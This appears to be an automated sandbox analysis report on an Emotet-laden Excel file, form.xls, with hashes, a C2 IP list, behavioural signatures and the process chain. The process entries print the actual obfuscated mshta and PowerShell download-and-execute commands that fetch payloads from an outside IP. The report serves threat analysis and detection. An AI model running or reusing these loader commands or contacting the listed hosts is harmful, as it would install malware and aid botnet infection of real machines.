Analysis
- max time kernel: 122s
- max time network: 154s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 28-01-2022 01:21

Behavioral task: behavioral1
- Sample: form.xls
- Resource: win7-en-20211208

General
- Target: form.xls
- Size: 47KB
- MD5: da5f5c8ebdc10b6e77da2c377b938734
- SHA1: 6ea85a244cde074f36c1af938a1d9bb5bb36b9ae
- SHA256: c1588629a0158ff10768a40ec5a6492b1028b73d2cf9a85f7d74f427f71beed2
- SHA512: f0f451785e81c6847ccb5c4e8983baf752518b5065c3834790de233f7a1fb1dcf9083bc929679b0a2344842ed004913d1f75022326d971aca58570d314c7f149
Malware Config
- Extracted: http://91.240.118.168/vvv/ppp/fe.html
- Extracted: http://91.240.118.168/vvv/ppp/fe.png
- Extracted: emotet (Epoch4), C2 list:
51.15.4.22:443
173.214.173.220:8080
212.237.5.209:443
192.254.71.210:443
216.158.226.206:443
162.243.175.63:443
212.24.98.99:8080
58.227.42.236:80
45.118.115.99:8080
104.251.214.46:8080
185.157.82.209:8080
46.55.222.11:443
188.40.137.206:8080
81.0.236.90:443
103.75.201.2:443
129.232.188.93:443
195.154.133.20:443
159.8.59.82:8080
79.172.212.216:8080
138.185.72.26:8080
200.17.134.35:7080
185.157.82.211:8080
209.59.138.75:7080
178.63.25.185:443
45.176.232.124:443
45.118.135.203:7080
164.68.99.3:8080
203.114.109.124:443
212.237.17.99:8080
50.116.54.215:443
131.100.24.231:80
212.237.56.116:7080
45.142.114.231:8080
162.214.50.39:7080
51.38.71.0:443
104.168.155.129:8080
107.182.225.142:8080
217.182.143.207:443
158.69.222.101:443
176.104.106.96:8080
207.38.84.195:8080
41.76.108.46:8080
110.232.117.186:8080
178.79.147.66:8080
173.212.193.249:8080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2368 | 3140 | CMD.EXE | EXCEL.EXE
-
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
-
Blocklisted process makes network request 4 IoCs
Processes:
flow | pid | process
37 | 1372 | mshta.exe
38 | 896 | powershell.exe
40 | 896 | powershell.exe
50 | 3524 | rundll32.exe
-
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
pid | process
948 | rundll32.exe
1916 | rundll32.exe
-
Drops file in System32 directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\Pattncvcj\nfrki.chz | rundll32.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
3140 | EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
pid | process
896 | powershell.exe
896 | powershell.exe
896 | powershell.exe
3524 | rundll32.exe
3524 | rundll32.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 896 | powershell.exe
-
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
pid | process
3140 | EXCEL.EXE (14 occurrences)
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
description | pid | process | target process
PID 3140 wrote to memory of 2368 | 3140 | EXCEL.EXE | CMD.EXE (2 occurrences)
PID 2368 wrote to memory of 1372 | 2368 | CMD.EXE | mshta.exe (2 occurrences)
PID 896 wrote to memory of 1012 | 896 | powershell.exe | cmd.exe (2 occurrences)
PID 1012 wrote to memory of 948 | 1012 | cmd.exe | rundll32.exe (3 occurrences)
PID 948 wrote to memory of 1916 | 948 | rundll32.exe | rundll32.exe (3 occurrences)
PID 1916 wrote to memory of 2420 | 1916 | rundll32.exe | rundll32.exe (3 occurrences)
PID 2420 wrote to memory of 3524 | 2420 | rundll32.exe | rundll32.exe (3 occurrences)
Processes
-
1. C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\form.xls"
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
2. C:\Windows\SYSTEM32\CMD.EXE
Command line: CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
3. C:\Windows\system32\mshta.exe
Command line: mshta http://91.240.118.168/vvv/ppp/fe.html
- Blocklisted process makes network request
-
4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
5. C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
- Suspicious use of WriteProcessMemory
-
6. C:\Windows\SysWow64\rundll32.exe
Command line: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
7. C:\Windows\SysWOW64\rundll32.exe
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
8. C:\Windows\SysWOW64\rundll32.exe
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Pattncvcj\nfrki.chz",sujrctswIYHGAk
- Suspicious use of WriteProcessMemory
-
9. C:\Windows\SysWOW64\rundll32.exe
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Pattncvcj\nfrki.chz",DllRegisterServer
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\QWER.dll
MD5: f0bd9fc58296e16df198512822c5f5d4
SHA1: 2160cb4cfad57c4b1b27eb91a8da06754c421697
SHA256: 2713c7112eea6f6a035cfb26e34aa2ddcfce2f66bfad0f01395cf29828ab2de3
SHA512: d3fee5fc2e713df2ef7a9f3b16781fde40102fb4d14b49e902c3e8b00c0c12f7eaabfc0f73a8873fa4db469e62ec005108e1ebe4c40235052be694b9e7daeffe
-
\ProgramData\QWER.dll
MD5: f0bd9fc58296e16df198512822c5f5d4
SHA1: 2160cb4cfad57c4b1b27eb91a8da06754c421697
SHA256: 2713c7112eea6f6a035cfb26e34aa2ddcfce2f66bfad0f01395cf29828ab2de3
SHA512: d3fee5fc2e713df2ef7a9f3b16781fde40102fb4d14b49e902c3e8b00c0c12f7eaabfc0f73a8873fa4db469e62ec005108e1ebe4c40235052be694b9e7daeffe
-
- memory/896-313-0x0000017DDB1C0000-0x0000017DF33B0000-memory.dmp (Filesize: 385.9MB)
- memory/896-320-0x0000017DDB1C0000-0x0000017DF33B0000-memory.dmp (Filesize: 385.9MB)
- memory/896-319-0x0000017DDB1C0000-0x0000017DF33B0000-memory.dmp (Filesize: 385.9MB)
- memory/896-277-0x0000017DF32F0000-0x0000017DF3312000-memory.dmp (Filesize: 136KB)
- memory/896-296-0x0000017DF34B0000-0x0000017DF34EC000-memory.dmp (Filesize: 240KB)
- memory/896-307-0x0000017DF39C0000-0x0000017DF3A36000-memory.dmp (Filesize: 472KB)
- memory/948-323-0x0000000004671000-0x0000000004692000-memory.dmp (Filesize: 132KB)
- memory/1916-329-0x0000000004C60000-0x0000000004C85000-memory.dmp (Filesize: 148KB)
- memory/1916-339-0x0000000005130000-0x0000000005155000-memory.dmp (Filesize: 148KB)
- memory/1916-343-0x0000000005190000-0x00000000051B5000-memory.dmp (Filesize: 148KB)
- memory/1916-337-0x0000000004F60000-0x0000000004F85000-memory.dmp (Filesize: 148KB)
- memory/1916-335-0x0000000004F00000-0x0000000004F25000-memory.dmp (Filesize: 148KB)
- memory/1916-333-0x0000000004EA0000-0x0000000004EC5000-memory.dmp (Filesize: 148KB)
- memory/1916-331-0x0000000004D40000-0x0000000004D65000-memory.dmp (Filesize: 148KB)
- memory/1916-326-0x0000000004670000-0x0000000004695000-memory.dmp (Filesize: 148KB)
- memory/2420-341-0x0000000004C70000-0x0000000004C95000-memory.dmp (Filesize: 148KB)
- memory/3140-381-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp (Filesize: 64KB)
- memory/3140-116-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp (Filesize: 64KB)
- memory/3140-118-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp (Filesize: 64KB)
- memory/3140-117-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp (Filesize: 64KB)
- memory/3140-119-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp (Filesize: 64KB)
- memory/3140-129-0x00007FF9F7A00000-0x00007FF9F7A10000-memory.dmp (Filesize: 64KB)
- memory/3140-128-0x00007FF9F7A00000-0x00007FF9F7A10000-memory.dmp (Filesize: 64KB)
- memory/3140-115-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp (Filesize: 64KB)
- memory/3140-383-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp (Filesize: 64KB)
- memory/3140-382-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp (Filesize: 64KB)
- memory/3140-380-0x00007FF9FB330000-0x00007FF9FB340000-memory.dmp (Filesize: 64KB)
- memory/3524-344-0x0000000000CF0000-0x0000000000D15000-memory.dmp (Filesize: 148KB)
- memory/3524-355-0x0000000004BD0000-0x0000000004BF5000-memory.dmp (Filesize: 148KB)
- memory/3524-357-0x0000000004CB0000-0x0000000004CD5000-memory.dmp (Filesize: 148KB)
- memory/3524-353-0x0000000004AF0000-0x0000000004B15000-memory.dmp (Filesize: 148KB)
- memory/3524-351-0x0000000004A10000-0x0000000004A35000-memory.dmp (Filesize: 148KB)
- memory/3524-349-0x0000000004930000-0x0000000004955000-memory.dmp (Filesize: 148KB)
- memory/3524-346-0x00000000010F0000-0x0000000001115000-memory.dmp (Filesize: 148KB)